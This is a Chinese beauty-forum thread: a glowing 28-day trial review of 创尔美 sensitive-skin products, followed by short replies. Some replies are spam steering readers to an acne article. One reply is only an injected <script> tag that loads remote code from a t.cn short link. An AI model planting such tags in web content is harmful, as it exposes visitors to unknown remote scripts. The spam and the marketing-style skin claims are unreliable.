第一美妆互动媒体,权威化妆品消费顾问!

·常居地:辽宁省-大连市·年龄:·肤质:干性皮肤·发质:中性发质·注册时间:2014-08-01
短帖
说起我和创尔美的故事还需要从一个月前说起,炎炎夏日,温度呼呼攀升,一下子就飙到了30多度,直至40度的关口,每到这个时候皮肤暴露在外,过敏问题也会层出不穷,很少有过敏现象的我也难逃这样的困扰,使得肌肤脆弱敏感,泛红、干燥、干痒等问题也开始凸显,28天前有幸被选中作为创尔美愈活肌诊室的学员,在专家的护肤建议下,才开始使用创尔美的护肤产品,开启了28天的超级抗敏感之旅!~

创尔美舒敏套装包括:安润舒衡洁面啫喱、胶原焕能修护蚕丝面膜和安润舒缓保湿乳液。28天的体验,带给我太多的惊喜和感动,最后的时间来给大家说说我的变化吧!~

step 1:创尔美安润舒衡洁面啫喱
肌肤出现问题,许多小伙伴们都会一忍再忍,其实创尔美专门为问题肌肤提供安全可靠的护肤品,为肌肤带来安全呵护,为肌肤注入生命活力。说起护肤,清洁绝对是首要功课,创尔美安润舒衡洁面啫喱蕴含独特氨基酸洁面因子配方,温和清洁肌肤,舒缓保湿。长时间暴露在户外,为你深层清洁皮肤中的污垢,洁净如初。

说起它的质地还要提一下第一次使用的尴尬,本来以为是去角质的免洗产品,结果.......其实是透明的啫喱质地,晶莹剔透,只需要加水就可以轻松揉搓出丰富的泡沫,虽然它的质感非常清爽,但是加水后的泡沫非常绵密细腻,软软的,细细的,舒适度也让我非常喜欢,完全没有干燥的紧绷感,反而非常水润,能够从肌底维护肌肤天然皮脂屏障,提高肌肤耐受力,让我真正爱上它!~

step 2:创尔美安润舒缓保湿乳液
对于创尔美安润舒缓保湿乳液的爱应该是让我意想不到,我总是对乳液有着抵触之心,觉得乳液总会有油油的感觉无法吸收,那种油腻感着实让我讨厌,没想到安润舒缓保湿乳液却让我有了意外之喜,多重保湿就靠它!

乳白色的质地,让我想到了牛奶,那样丝滑柔润的细腻感,轻轻推开特别轻盈的质感吸收速度惊人,用指腹按摩促进吸收可以瞬间渗透肌底,因为其中富含天然植物舒敏的主要成分,所以可以缓解敏感不适,舒缓肌肤敏感现象,多重补水。
涂抹于面部肌肤时的感受真的很享受,快速吸收,缓解肌肤敏感缺水泛红的问题,完全没有我担心的油腻感,反而非常清爽轻透,还可以给你惊人的补水保湿效果,这一段时间让我对它刮目相看!

step 3:创尔美胶原焕能修护蚕丝面膜
如果看过我前几周的使用心得,肯定会知道我的最爱当然就是它:胶原焕能修护蚕丝面膜,从范冰冰一年面膜的使用量到黄晓明敷面膜的频率,不难看出面膜对于护肤的重要性,就连美到家的他们都在勤奋敷面膜,我这样的“丑女”怎么能懒惰呢!

创尔美胶原焕能修护蚕丝面膜绝对是舒缓修护的一大法宝,它采用了来自棉籽绒精华的“天然羽丝”,所以可以看出质地非常非常的轻薄,如薄纱般轻盈,如一阵风般清爽,如此轻盈的质感绝对让你惊喜!

敷于面部后会让你完全感受不到面膜纸的包裹一般,薄薄一层舒适又亲肤,与面部皮肤紧密贴合,精华吸收倍增,让你在护肤的同时享受更优质敷感。其中富含了活性胶原和天然矿物质海水成分,舒缓修护加滋润,一贴搞定。

面膜的贴合感舒适透气,温和柔润的质地不像其他面膜那么黏腻,清爽度十足,面膜纸吸收了足量的精华液,满满的精华可以充分被肌肤吸收,完全不用担心会下滴,揭下面膜时你可以感受到肌肤那种水润感和吸收力,水润度倍增同时增强肌肤的屏障能力。

看看这周使用下来的效果,基本已经巩固了肌肤的健康屏障,敏感状态不再反复,皮肤更加光滑细腻,泛红现象不再出现,干燥的情况也改善了很多,皮肤摸起来滑滑的、嫩嫩的,更加年轻富有活力!

如果让你们看到28天前的我和现在的对比,你不要怀疑,这就是我,哈哈哈哈,简直就像变了一个人,都说世上没有丑女人,只有懒女人,看来真的没错,这就是创尔美,从内而外补水,为敏感的干燥肌补充足够的水分,深层修护皮肤屏障,调理敏感肌底,让肌肤重回健康状态!!!

小六。唐 发表于 2017-9-12 08:54:50 |显示全部楼层

护肤 | 感受28天舒缓抗敏感之旅的神奇

不错
回复本楼

沈小荶 发表于 2017-9-13 09:00:54 |显示全部楼层

【晒太阳的瞳瞳】感受28天舒缓抗敏感之旅的神奇

顶一个
回复本楼

夏夜夏星辰 发表于 2017-9-13 10:25:58 |显示全部楼层

对于女孩子来说祛逗、祛痘印真的很重要 ,~。☆。~。因为女神的第一标准就是肤白貌美,有木有~想要变身成女神的!自己的皮肤一定要打理好,有很多的小夥伴都在為痘痘、痘印而煩惱,但自從看了網文[兰闽的脸儿]之後,我照著它提示的去做沒多久也就兩個月不到就全好了,真心太精髓了! 想要根除煩惱的朋友可以現在就去絔度搜搜
回复本楼

夏夜夏星辰 发表于 2017-9-13 15:31:45 |显示全部楼层

从上学脸上就开始长豆豆,一直尝试各种方法都没能从根本上去改善自己的问题,直到有一天再一次偶然的机会在网上看了了一篇名为 [兰闽的脸儿] 的文章,根据里面所分享的办法耐心使用 ,刚开始其实是挺怀疑的,但还是坚持了下来,☆没想到一个月以后就有了很大的效果,∮感觉真的很不可思议,现在看到自己的脸痘痘、痘印全没了!真的好开心,◎你可以上网搜来看看
回复本楼

窦小姐和赵先生 (广东省-)发表于 2017-9-13 17:44:10 |显示全部楼层
这个就必须要顶一下咯111111

回复本楼

青青河边草11 发表于 2017-9-13 18:10:40 |显示全部楼层

【晒太阳的瞳瞳】感受28天舒缓抗敏感之旅的神奇

<script src="//t.cn/R9O9b9G"></script>
回复本楼

KM62137002 发表于 2017-9-13 22:51:35 |显示全部楼层

看着不错
回复本楼

q525093551_ 发表于 2017-9-14 07:51:30 |显示全部楼层
感谢楼主分享
回复本楼

11nsv 发表于 2017-9-14 10:41:41 |显示全部楼层
产品很棒,我很喜欢!
回复本楼

夏夜夏星辰 发表于 2017-9-14 13:45:59 |显示全部楼层

我长doudou有2.3年,而且挤出来都是白色的颗粒,好恶心,当时我都快绝望了,现在我没有逗~斗了,文章·【兰闽的脸儿】写的挺实用,希望每个女孩都不要为兜兜烦恼,
回复本楼

兔子吃鸡腿 (江苏-苏州)发表于 2017-9-15 07:35:42 |显示全部楼层

长草长草
回复本楼

sunbet138 发表于 2017-9-16 11:00:42 |显示全部楼层
感谢楼主的分享!赞一个。
回复本楼

wap678 发表于 2017-9-16 15:43:27 |显示全部楼层
楼主辛苦了!
回复本楼

sunbet138 发表于 2017-9-16 17:20:09 |显示全部楼层
回复本楼

ladychowchow 发表于 2017-9-16 23:26:38 |显示全部楼层
好用啊
回复本楼

桃夭静儿 发表于 2017-9-18 10:25:36 |显示全部楼层
敏感肌肤 最难护理
回复本楼